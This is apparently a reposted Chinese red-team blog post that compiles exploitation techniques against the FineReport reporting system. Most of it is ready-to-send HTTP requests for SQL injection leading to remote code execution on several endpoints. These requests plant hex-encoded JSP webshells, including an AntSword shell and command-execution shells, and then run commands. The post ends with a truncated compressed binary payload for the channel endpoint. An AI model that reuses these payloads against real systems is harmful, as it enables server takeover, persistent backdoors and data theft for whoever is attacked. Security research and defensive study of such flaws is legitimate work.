2026-05-19 05:26:03 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档详细分析了帆软报表系统存在的多个高危安全漏洞，包括exportexcel接口SQL注入导致RCE、ReportServer接口SQL注入RCE及print/ie/pdf组件RCE。通过具体POC演示了获取sessionID、写入Webshell（蚁剑马、cmd马）等攻击手法，并指出实战中需注意根目录自定义、数据库名修改等细节。文章提供完整的HTTP请求包和编码技巧，具备直接可复现的攻防实战价值。 综合评分： 87 文章分类： 漏洞分析,渗透测试,WEB安全,实战经验,红队

cover_image

攻防实战 | 帆软报表FineReport打法合集

原创

安全艺术安全艺术

安全艺术

2026年5月12日 13:11 北京

在小说阅读器读本章

去阅读

攻防实战碰到的帆软报表的一些打法，简单记录下。

1. 帆软报表系统export excel接口存在SQL注入导致RCE

根目录不一定是webroot，实战碰到自定义的根目录情况。

获取sessionID

POST /webroot/ReportServer HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

op=getSessionID&viewlets=[5b]{'reportlet':'/'}[5d]&

写入一句话证明

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: */*
params: %3Ctest%3E%0A%3CLargeDatasetExcelExportJS%20dsName%3D%22XX%22%20colNames%3D%22%7B%7D%22%3E%0A%3CParameters%3E%0A%3CParameter%3E%0A%3CAttributes%20name%3D%22aaa%22/%3E%0A%3CO%20t%3D%22Formula%22%3E%3CAttributes%3Esql%28%27FRDemo%27%2C%22VACUUM%20into%20%28%27FRDemo2.db%27%29%22%2C1%29-sql%28%27FRDemo%27%2C%22pragma%20writable_schema%3Don%22%2C1%29-sql%28%27FRDemo%27%2C%22delete%20from%20sqlite_schema%22%2C1%29-sql%28%27FRDemo%27%2C%22create%20table%20a%28u%20text%29%22%2C1%29-sql%28%27FRDemo%27%2C%22replace%20into%20a%20values%28char%2860%29%7C%7Cchar%2837%29%7C%7Cchar%2832%29%7C%7Cchar%28111%29%7C%7Cchar%28117%29%7C%7Cchar%28116%29%7C%7Cchar%2846%29%7C%7Cchar%28112%29%7C%7Cchar%28114%29%7C%7Cchar%28105%29%7C%7Cchar%28110%29%7C%7Cchar%28116%29%7C%7Cchar%28108%29%7C%7Cchar%28110%29%7C%7Cchar%2840%29%7C%7Cchar%2834%29%7C%7Cchar%28115%29%7C%7Cchar%28101%29%7C%7Cchar%2899%29%7C%7Cchar%28116%29%7C%7Cchar%28101%29%7C%7Cchar%28115%29%7C%7Cchar%28116%29%7C%7Cchar%2850%29%7C%7Cchar%2848%29%7C%7Cchar%2850%29%7C%7Cchar%2854%29%7C%7Cchar%2848%29%7C%7Cchar%2849%29%7C%7Cchar%2850%29%7C%7Cchar%2854%29%7C%7Cchar%2834%29%7C%7Cchar%2841%29%7C%7Cchar%2859%29%7C%7Cchar%2837%29%7C%7Cchar%2862%29%29%22%2C1%29-sql%28%27FRDemo%27%2C%22COMMIT%22%2C1%29-sql%28%27FRDemo%27%2C%22VACUUM%20into%20%28%27%22%2BJOINARRAY%28%5BENV_HOME%2C%27/../sectest.jsp%27%5D%2C%27%27%29%2B%22%27%29%22%2C1%29%3C/Attributes%3E%3C/O%3E%0A%3C/Parameter%3E%0A%3C/Parameters%3E%3C/LargeDatasetExcelExportJS%3E%3C/test%3E
sessionID: 10f1fd1d-177d-484e-bcc8-afe42ddfa7cd
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive

访问http://xxx.xxx.com/webroot/sectest.jsp

2. 帆软报表系统ReportServer接口存在SQL注入导致RCE

注：打过一次之后还要再打的话要改下数据库名称

2.1. POC

http://xxx.xxx.xxx:11000/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}

GET /webroot/decision/view/ReportServer?test=&n=${9*9}
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: tenantId=default

2.2. 写入蚁剑马

http://xxx.xxx.xxx/webroot/secsec.jsp?a=javax.script.ScriptEngineManager

密码a

类型选择jspjs

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fsecsec.jsp%27%20as%20secsec%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20secsec.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20secsec.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)}

2.3. 写入cmd马

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fsecsec.jsp%27%20as%20secsec%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20secsec.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20secsec.exp2%28data%29%20VALUES%20%28x%273c25a2020202069662822736563736563222e657175616c7328726571756573742e676574506172616d657465722822707764222929297ba20202020202020206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229292e676574496e70757453747265616d28293ba2020202020202020696e742061203d202d313ba2020202020202020627974655b5d2062203d206e657720627974655b323034385d3ba20202020202020206f75742e7072696e7428223c7072653e22293ba20202020202020207768696c652828613d696e2e7265616428622929213d2d31297ba2020202020202020202020206f75742e7072696e746c6e286e657720537472696e67286229293ba20202020202020207da20202020202020206f75742e7072696e7428223c2f7072653e22293ba202020207da253e%27%29%3B'),1,1)}

访问

http://xx.xxx.xxx/webroot/secsec.jsp?pwd=secsec&cmd=whoami

3. print/ie/pdf rce

3.1. 执行python frencode.py

3.2. 访问

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host:
sessionID:[24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFATTACH[25]2520DATABASE[25]2520[25]2527[2E][2E][25]252Fwebapps[25]252Fwebroot[25]252Fgnip[2E]jsp[25]2527[25]2520as[25]2520izzlul[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFCREATE[25]2520TABLE[25]2520izzlul[2E]gni[25]2528data[25]2520text[25]2529[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFINSERT[25]2520INTO[25]2520izzlul[2E]gni[25]2528data[25]2529[25]2520VALUES[25]2520[25]2528x[25]25273c2540207061676520696d706f72743d226a6176612e696f2e2a2c6a6176612e7574696c2e4261736536342220253e3c256f75742e7072696e7428224b464322293b537472696e6720613d726571756573742e676574506172616d6574657228226122293b69662861213d6e756c6c297b627974655b5d20623d4261736536342e6765744465636f64657228292e6465636f64652861293b537472696e6720703d726571756573742e676574536572766c6574436f6e7465787428292e6765745265616c5061746828726571756573742e676574536572766c6574506174682829293b537472696e67206469723d6e65772046696c652870292e676574506172656e7428293b46696c654f757470757453747265616d206f3d6e65772046696c654f757470757453747265616d286e65772046696c65286469722c22776562726f6f742d686f6d652e6a73702229293b6f2e77726974652862293b6f2e636c6f736528293b7d253e0a[25]2527[25]2529[25]253B[27][29][2C]1[2C]1[29][7D]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: tenantId=default
Connection: keep-alive

3.3. 访问生成的webshell地址/webroot/utuo.jsp

如果返回200，但是没有正常解析，尝试访问如下接口后再访问webshell。

/webroot/decision/file?path=org.apache.jasper.servlet.Jasperlnitializer&type=class

3.4. 命令执行马

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.2764.2 Safari/537.36
sessionID: [24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFATTACH[25]2520DATABASE[25]2520[25]2527[2E][2E][25]252Fwebapps[25]252Fwebroot[25]252Fpoiu[2E]jsp[25]2527[25]2520as[25]2520qwerty[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFCREATE[25]2520TABLE[25]2520qwerty[2E]rce[25]2528data[25]2520text[25]2529[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFINSERT[25]2520INTO[25]2520qwerty[2E]rce[25]2528data[25]2529[25]2520VALUES[25]2520[25]2528x[25]25273c25206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229292e676574496e70757453747265616d28293b696e742061203d202d313b627974655b5d2062203d206e657720627974655b323034385d3b6f75742e7072696e7428223c7072653e22293b7768696c652828613d696e2e7265616428622929213d2d31297b6f75742e7072696e746c6e286e657720537472696e6728622c302c6129293b7d6f75742e7072696e7428223c2f7072653e22293b6e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b253e[25]2527[25]2529[25]253B[27][29][2C]1[2C]1[29][7D]

/webroot/poiu.jsp?cmd=whoami

4. 帆软报表channel存在远程命令执行漏洞

POST /webroot/decision/remote/design/channel HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Testdmc: whoami
Testecho: echo
Cache-Control: no-cache
Pragma: no-cache
Host:
Content-Length: 10193

{{unquote("\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xadX\x09|\x14\xd5\x19\xff\xcffwg2\x99\\\x0b\x01\x06\xd0JK1\x80\xd9QT\x84\x8d\xa2$$\x10\xd8\x04\xea\x060\x846Nv\x87dpwf\x99\x99\x85\x8dm\xede\xef\x8b\xde\x85\xde\xf6H\x0f\xdb\x8am\x17-U\xa1\x07\xad\xb5\xf6\xd4\x1eZ\xadm\xadG[\x7bh\x0fj\x95\xf4\x7bov7\xd7\x12\xd0_\xf3\xdb\xbc\x99\xf7\xde\xf7\xfd\xdfw\xbf\xf7\xe6\xc6'\x10r\x1d4\xee\xd6\xf7\xea\xd1\x9cg\xa6\xa3\x1btw\xb8[\xcf\x86\xc4\xfb\x8e\x7dk\xce\xd5?\xa9B\xa0\x13r\xda\xd6S\x9dz\xd2\xb3\x9d.T\x7b\xc3\x8e\xe1\x0e\xdb\xe9T>\x7b\xf9\x15\xe0\x7f\xfb$j\x02\xec\x9f\xc0\xceO\xda\x99\xe8.'\xea\x0d\x9bN*j;C\xd1as\xd0p,\xdd3\xa2\x865dZF\xd4\xcd\x9a\xd1\xde\x91\xac\x91\xda\xa6\xa7sF\xe3\xdd\xef\xed\xfe\xf3\x89;?\x10@ \x8e\xa0G\xe3\x1e\x96\xc4\x09E\xdb\xe5h\x1cE#\x14\xad\x8c\xa21\x12\x8d\xf1\xb7\xc6\x11\xda\xcb <D\xe2L\x07-\xad[C\xda\xe6\xc1\xddF\xd2k\xcdgI\x9a\x96\x19\xa4a8\xd1v;\x93\xb5-\xc3\xf2\x18\xe0\xe67h\x0f\xd6\xee>tv\x00u;\xb00\xe9\x18D\xd6\x91\xc9z#\x9c\xca5=\xc3\xed\xb0\xf4\xc1\xb4\x91\xda\x81\xc8\xb0\xee\xf6\xd8^O.\x9d\xde\xe2\xd8Y\xc3\xf1Fv d\xba\x9b\x8c\x91.\x28\xd9\xe2P\"\xab[q\xd4'uk\x9d\xdd\x91\xf7\x1c\xb2\xa2i[\x1efM\x90\xb7\xcd\xb6\xd3\x86n\xb5\xf6CL\xeanRO\x91>\x17\xf7\xcfd\x01\xdf\x8e\x1a\xd9Qk\xf79\x12\xdeH\x9a\xd9\xa31Y\xd6'\x97M\x9b\xd7\x92\x0cX3\xa31\x89\xcc\xd0\xca\\Z\xfbT~\x02\x95\xa9kz#\xdd6\x93\xec\xdc\x99\xd0:\xca\x84\xa4M\xcdn\x9b\xa4Lu\x1a^r\x98\xf8f\xd4\x88\x13\x15\xf9jK\xc6\xeb\xd13\x86K\xb6\xea\x9f`\xac\x84\xe7\x98\xd6\x10Q\xcd*S\x91\x07\xf4A3M\x0b\x7b\x08\xf4\xef\x98\x00\xc0|\xea\x9en\xe9\xf1p\xea\xc7\xa2\x12'\x8f\xcc\xf5\x86e8:s\x18\xadJ\xa4C&C\xbbpf4n\xcf\x29\xecd\xc3j\xb6L\"i\xb3\xe8\xbe\xe4\x8c\xc4\xf13ndqo\x89\xb15\xef\xe0\xbc\xd3\xc5\xf3\xdaA\x97G\x19\xe3\xba\xe7\xf5w\xef\xffx\xcf#\x02\xa5f>\xeb\xa7\xaa\x90eYq\xc5L\x28L\x81h9 \xa2[\xec\xdd\xf6\xb4\xa08\x9a\xdb-\x1e?y\x95\x1e@0\x8e\xba2q\x7bZw\xc9B\x8d\x13\xfc\xc5\x87\x98\xfev\xd633~@^6\x93\xfe\x83#\x9e\x91\xa4@\xe0\xd1\x7d\xa5\xb1+m\xf0\x94\xd9\\b',%\xab;\xb4\xdaz\xc3\xf3\x18\xdc\x8c\xe6,9T\xd3\x93I\xc3u9\xaa\xcf8\x0e\x94x\xbe@>#\xf3\xcb\xba\xe7`\xd1\x92\x8b\xa6Yu\xdb\xa2\x9ffn\xda_\xb8#\x80\x90__\xdas\xaegg\xd6\xf2\x05m\xc7\x9dRW\xa8^\x0cq\x01\xc8\xe4\xabf\x0c\xca\x99\x8d`Z\xae\xa7S\xe2\xea\x14n\x1e\xb4\xd3Gw\xd7\x04\x06V\xb5\xdc\xe7/E\xc9\x82~x\xe6\x9c\"\xc4\xa9LY\x82\x88\xfa\x10|'\x29*\xa2\xaf\xbdW\xdc\xf8h6^\x0av\x81\xe2|\xe3\xf3\x82\xea6\xbca;\xd5\x95\xc9\xa6\x17'\x0c\xc7\xd4\xd3\x9d\xb6\x93\xa9\xdfss\xe4\xd6\x87\xd7=Y\x8ax\xcb\xd3\xa9\xb89<\xbc\xf7\xe0:\xcc\xa6\xd1\x94\x91L\xeb\xac<M\x1c\x953\x1c\x8e\xd5\xb2\xc9\xdbT\xb1\x92\xc5\xc7\x9d\xcah\x18\xd79\xf9\xec^\x071&\xbc\x9b\xb3\xb8\xdczVO\x0e\x1b\xd1\xbcN\xacQ\xd3\xf2\x98\x12\xe9h\xdeM\x7b\xc9\x28\x05S>\xdak\x90\xbc\xa4\x97\xcb\xe4\xae\xde\xbe\xf9\x98u\xe3\x17.\xacB\xb8\x0b\xb5\x03\xa6\x95\xa2\x28\xeb\xc9eH\xf7.\xd4\x0d\x10\x83\xe5\xa6\x0d\xaf\x8b\xc6\xf3\xfd\x90\x07J9G.\xac\xea\xefo\xebGx \xe9\xa7r\xa4\xbfB.\x87\x06\xac\x92\xa4\xb4\xe3\x0c\xd89/\x9b\xf3\x8a\x9b /\x91s|&v\xa2\xd0\xc6\xc7\xc9\xcb\x8cg\x09Ut\x8a\xdb\xcd\xd3\xb8\x82$\xbd\x97-\xffQ0\x9c;c0\xf0z\xc7\x0b\xb7\x1e\x1c8+r\xfc\xad\xb1\xb2\xef\xd9:\x11*u\xec\xf9B\x16Yc\xf4G\x80L\xbbM\xcf\xaaMCC\xf7_R\"\x0e\xd0x\xa0\xbf\xed\xc6\xa7\xe6\x9e\x08K\xbd\x0f\x15\x87\x1b\xf7~\xff\xe4\xd7o\xa7\xe9\x8b\x84\xb0\x8c8,\x196\xb2\xac\xd9#\xc1\x91\xb1\x09\xae\x08\x8f\xf5s\x12\xf6\xcaX\xc4NAy\x09#\"\xae\x95\xf0r\x09\xaf\x90\xf0J\x11\xd7Ix\x95\x88W\xd7 \x82\xd7\xb0\xe6\xb5\x12^'c\x01\xae\x97\xf0z\x11o\xa8\xc6B\xbcQ\xc6<\xbcI\xc4\x9bE\xbcE\xa6\xfe[e\xbc\x0do\x97\xf0\x0e\x09\xef\x14\xb1_\xc2\xbb\x18\xfa\xbb%\xbc\x87=\xdf+\xe1\x7d\x12\xde/\xe1\x03\xac\xf7A\x09\x07d\x1c\xc4\x87$|\x98\xf5?\"\xe1\xa3\x12>&\xe1\xe3\x12>!\xe2\x06\x19+`\x89\xf8\xa4\x8c\x8b\xf0\x29\xd6|Z\xc6g0*\xe2\xb3\">'\xe1\xf32V\xe3\x0b2V\xe1F\xd6|\x91\x91\x7f\x895_\x96q\x13\x0e\xb1\xb7\x9b\xab\xf1\x15|\x95a\x7fMF\x01\x87\x99\xb0\xb7\x88\xb8\x95=\xbf.\xa3\x13\xef\x96q\x04\xdf`\xcdm\"n\x17q\x87\x88\xa3\x02\x1a\\\x9e9\xdb\xa8,P\xf1\xde\xda\xb5N\x80\xb0Q@m\xbb\xed\xd7\x0e\xbeA\x86\xbex\xce\x7b\x9ez\xd7\x03\x7f]# |\xa9i\x99\x1e\xbdT5/\xdd& \xd8N\xd1\x28\xa0>N9\xe6\xc7m/;v\x11@\xc2\xd3\x93\xd7\xd0\x09\x95\xf7\xf9\x82\xfbE\x1c\xe3\xd6\xbb\x8e\x0c-\xe2\x9b\xa4\xb6\x88o\x91\x8a\x02m\xba,\xd2wQ\xfa\x0ap\x9aym\xa2\x84\xe2e\xc9O\x28\x8d'\x94VJ\x28\x8d'\x94\xb6nswk\x7fE\xeaLz\x9c\xd6\xd7\x90\xd5m-Q|\xe5\x9b\xfd\x06\xddJ\xa5\xa9 1=\xe4\x8e|\xd2\xc8\xb2Q\x8a\x96o\x0b\xf8\xccs\x13\xe2\xb42\xa4\xbc\x8c\xb6\xae\xb7\x7bm\xdet\xbb<v\xd8\xa0\x82\xfc\x7f\x11<D\x19\xdaI\xcfU\xcd\xd3\x0f\xd6\xd3k\xd8\xd2\xe9D\"\xbeC\xf1M\x81BFH\xd89'it\x9a\xcc\x815\x9b\x0d\xb7\x7b\xcfK\xa2\x8cAA\x02\xbd\xe4=\x05\xc7\xf1]\x05\xdf\xc3\x9d\x02Dv\xbf\xd0S\xae\x82!\x0c\x0b\x93\xcf~\xbd|\xaaU\xc1\xf7q\x17\xc5\x88\x917\x92\x0a~\x80\xbb\xe9\x7d\xd8\xf3\xb2\x14E\x9e\xee\x90\xe0\x02\"\xe3LW\xe6,\xcb\x8f\x9d0\x15\x11w\xf1\xf9\xb4\xc6\xb0\xaf\x29\x0d\x0d\xa5\xedA=M\xeb\x8c3\x94]F\x92Se.\xee\xbd\x02\xea\xc6kZ\xdct=\x05?\xc4\x8f\x14\xfc\x18?\xa1\xa0u\x8c=\x0a~\x8a\x9f\x09|K\xa6k\x01\x0b\xde\x29\x85S\xc1=\xb8W\xc1\xcf\xf1\x0bJ\x8f\xa9\xf6\x12\xfcK\x98?\xd4E\x9e\x1a2\x1cf\x9e_\x8a\xf8\x95\x82\xfbp?Y\x8e\x90\xaf4\\:2\xb8\x84^M\xbd\x0dd\x0d\xa6E\xc3T\x87\x08\x90z\xa9\x96\x1a\xc9a\x9b\x81\xfc\x9a\xc4b\xfdT\x86\xec\xf5\x00\x1e$n=\x95*qs\xd2\x0e\"\xa5\x14=G\xc1o\xf0\x10\x91\xdbn\x94\xd5x\x11\xbfU\xf0;\xfc\x9eF\xb6\xd3.b\xef#-\x1e\xc6\x1f\x04\x9c\xdd\x1e\xdb\xb9s\x9f?\xb4s\xa7;B\x8be.\\\xb1sg2\x93\x8a\x92_\x04\x04\xb4$1i\x83\xa6\xa5\xb9\xe4\xc7@\x0bu\xe7N\x95\xb3-g\xa6\xb9\x0c\xf3\xc6g\xb6\xf8&/N1\xf1\x1fQ\xf0\x28\x1e\x13\xf1\xb8\x82?\xe2O\x02\xe6pb\xd3\xd6\xdar\xbbv\x19\x8e\x91\xba\xb2\xa8\x89Z\x9a\xe8\xb2hk\xa1%\x0c=S\x9a\x0bm\xed\xedlY\xc5\xe0\xfe\xcc\x9a'\x14\xfc\x05w\x29\xf8+\xfe\xc6\x9a\xbf\x8bxR\xc1S\xf8\x97\x82\x7f\xe3.\x11'\x14\xfc\x07O+\xf8/\x9e\x11\xf1\xac\x82\x93\x18S\xc8<\x02\x29>.i\x8f\x9d\xc8%\x87;M#\x9d*\xc7\x8cB\x87\xed\x9fQ\xec+B\x95\x10\xa4\xe8\x10B\x14d~\xc8\x0b\xfc\xd8\x7dF\xb9\xef\xe4\xe8t\x951\xb4\xf2a\xbe\xb8a\x0b\x98]R\xb1\x9c\xb9<\xb4\x1b\xa6&\x89P\xf1\xd6T\x8a\xf3\xc9&\x12\xb0\xfaL\x05+\x092!G&8\xd5\xf1O\xeb\x1a7\x09\xd5\xead\xcea\xc7\xeb\x92D\xb3\x9b\x97NOf\xca+\x8ad\xbf\xb3\xde\xb1s\x94\xc5j\x05:>\xd5ZL/\x0a\xcc\xa9he\x05\xa5\xe2\xd1\x8c\x12v\xc1\xc4\xda\xd5>\xac;\x09cO\xce\xb0\x92F\xeb\xd2\x1dT2\\\xaa\x80|\xbf\xe9\xa2\x96W\x8d\xa6\xe6\xae\x0a\x95\x8c0i\x96\xa70\xd9o\xd2\xaa\xfe\x81\x88\xb0z\xfb\xb6t\x08\x15\xee=~\x9e\xfa\x07J\xf2\x7fs\x85\x8b\xec4\x9e\x89\x0b\x94,\xea#\xb0\x95H\xc4m\x93\xf2e2\x09E\x9bi\xed\xb5\xaf!\xcdVW\x28\xdd\xfd\xd3\x87*j\xdcTAR\xb6\xaeh\xba\xfc\x7b\x08\xb7\x1b\x191\xe4\xd2\xcd\x85,wn%\xfa\x8a\x018\xb1V\xf1\xaa\xe1\x17\xb6\xd2'\x14\x01K*AUB\x92\xe9 \xe1x\xeev\xd3\x1b>\x85\xc0$\xe0\x9c\xe6\x0aR\xf0\x0d\x8es3\xc6\x89\xe0\xc5\xe2\xd3:\xa9\x1c\x17\x07\xfdH\x9d\x947sK\xcc\x93\x13\x8a\xd8\x975W\x9c\xa8,\xcb\xacqb\xbf\\\xf1Q\x89\xc5=;\x00\x91O\xf5l\xd6\xb0\xc8\xb9-gd\x9cb\xed$1\x166\xb7\xcf4\xdd0\xbe\xa5\xb5\xe9\xae\xb1\xf2\"\xb2*\xe9\xd8a\xb1\xcb\x00\x15M\xb1\xfc\xa6tY\xa5\xdb\x8e\xe12\xdc\xa5\xf1\xa9\xbc\x8b\x8b\xc4,a<\xbb\xb4\x11-\xe2d\x16\xa9\x96\xa4\x0c\xa4\x9b\"\x09A\xbb\xaf\xee\xa4\xda\xfd\xbe\xeb\xd7\xe6\x81U\x02\xe6\xc7\xa7\x11\x17\x89\x8aI\xd8F\xf7\x14\xa2?\xbb\xf9\xd4\x84K\xfb\xdbJ\xe9QA6\xf2\xa1\xc1\xdfz\xcb\x02R\x84\xb4U\x8c\xaf\x06Zp\x1d\xbf\xd1\x19\xa9bE;\x9d\xf9'\x15@\x82\xa8%\x88D\x8e\x02;\xe9W\x8fZ\x92\xd0\xbf\xcd\x9b\xbcl\x07\x9bw0O/\xa9\x90\xa9\x15\xd2\x92\xce\xe0\x9b\xe8&\"\xa0\x9b\xfe\xe7\xa3\x07\x9b\xe9\xb9\x85\x7fz\x7d\x09\x82\xf4N\xa7\x29j\xb7\x02U\x87 a\x0eM\xdc\xb2\xec0\xedZq\xa1\xbbj\xcd\xb2[\x10\x28\xa0*\x12<\x8c\xd0Q\x84\xfd_,X\xb52\xd4\x14R\x83\xb7\xdf\x10x\x8b\x1al\x0a\xad\x88\x85\xd5\xf0\xf1@^\x0d\x17 \xc6DU\x8cH\x05T\x1f\x0c\x0c\xd1\x9bLo\x07\x02/]\xa6\x86#5\x04\x12\x93T\xe9\x18\x94\x03\x81M\xcb\x96-S\xa5H-\x8dE\xeaXS\xcfgG!\xc5\xaaG\x03-l\xae\x91/\x1a\x89UW\xad\x94\x9bd\xb5\xfaV\xcc\x12pC\x80\xde\x9a\xe4[1;\x80X\xcd2\xb5&\xd2T\x84-`Ndn\xf06\xcc\xeb\xab\xba\x19j\xa2\x80\xf9\xaaD\xdd\x05\x7dUG\xb0\xb0\x8f48\x8b\xc6\xce\x8e\x29\xaa\xc2\x28_PE\x94\x8cF\xa1\x97\x05l\xa2\xd6\x9f8\xc7\x87\x88,\xe2\x08J\x09aQ_\xe4\x85\x87\xf1\"\x06q\x14\x8b\xbaOG\xbbx\x9c6~\xdeq\xc8\xe7\x15\xf0\xe2\x03\xa8[~\\X\xb3\x9c^\x0f\x0a\x97\x04\xd7\xb0\xb1\x83\xb8L\xadePKB%\xa8\xbe`\x11\xaf64\x8ew.\xc3\xeb\x0b\x8e\xbf\x13\xf6v\x8e\x84'\x96G\x9a\x0bX\x1a\xabS\xebn\x0f]\x7d\x1b\x16\xc5\xea#\xe4\xb7\xe5\xb1\x06\xb5!Bk\xb4\x1c@D\xad\xaf\x8aD\x13j\x7d0\xa2%FQ\xcf\xba\xe7\xf3\xee\x05\x89\xaa\x95\x8dM\x8d\xc4z\x03\x9a\xd4\xfa\xa6\xc6\xd0\xd5j]S\xe3\x8a\xc4\xf5\x8d\xc2\xe8\xd8\xe3G\xb0\xa2\xef0.\x8c5\x1e\xc1E\x7d*\xb9\xe8\xe2\x02V\x16pI,r\x04\xab\xfa\x8e`u\x9f\x1a\x89\xc4\x0e\xa3\xf50.\x8d\xcdRg\x15pY_l\xf6q\xccR\x1b\xd5\xd9\x05\xaci \xf7_\xbe\x7dt\xec\xb1[p\x85\xdaX\xc0\xda\x9b\xd1V@\x7b\x01\xebbMg\xa4\xf7b_o\xb5\x89+|\xd6\x01\x84GQ\x7d\xbd,\x8c>\xfb\xb7R'D\x1do\x14\xc1\xf8!\x8ai\x03/\xa7\xdb\x7b\x03\x82\x81\xafP\xe06\xd0\xc86\x8a\xf50E8]\xf0\xb1\x9d\xda\xbb0\x7b\x0c\x8b\x11\x16q\x95\x88>\xfa\x09\"\xc24=\x86>TO\x1e\x14\xb1\x83\xf7\xfaA\xaf;\x83\xcf\xa2^\xc4K\x85\x938NC\xfeO\xfe/\xdaNb\x95\x88\x97\xf1__\xcd3\x08\x08OC=\x89\x16\x11\x03\"\xae\x16\xa1?\x83\xf943\x86\x0e\xd4\x9d\x02\x9e\xa1\x96!\x81\x13\x08?\x8d\xd0\x18I]A\xc8\x10\x93\xe5*\xa0\x8d$b*\x0d\"IJR\xfaB\xa5\xff*\xa6\xe6!\xae\xebD\xbdS\xd4\xb2\\78\xc3\xae\x09\x0c\xc1\xd31\x04\xd8\x95\xaa\xc8\xe0\x11~\x98\x9e\x97\x09=\x14zsbA5\x18Y\xf0i\xa8j\x90\xc2\xac\xa3\x87\x02+FU\xa1\x80\xf5\xb1\xe0\xe8\xd8#-\xdf\x85r\x04\x9d\x7d\xe7\x1d\xc6\x86;Zh\xb8\xab\x85\xb86\xdeD\xb0\xf5TgTtV\xf0N#\xc8\xcc\x92\x08S\xc4\xee-\"\xae\xa9Q\xca\xb20g\xa6y\xe1\xca\xe0\x9f\xf4\x94i\xac\x80\x9b\xf0\x0fT\xe7\xd8'\x9b\x28a\x9c\x28\x7d\x7f\xc1\x02\x99\x84m\x121W\xc4<\x11\xea\x99~\\\xd8\xf3\x88\xf9\x97K3\xeb\xe7\x9d\xf9\xc7\x85H\xdcN\x12\xacN\xe0\xd4/\x0e\x06\xd9\xad\x91X;m\x7b\xda6x\x01\xbfk\xa7\xe8\xec\x92\xd6\x07\xb5\xad\xb4\xdf\xb8\xdaV\xabt47\xf8\x0e\xe4j\xeb\xf5\x14\xed\x03\xeebBh\x9dr\x1bV\x8as\xc5\xeb\xb0\x8c\x1a\x11\xf3\x05h\xcf\x11\xb6\xe2\x85\xf2\x14W\x85\xe5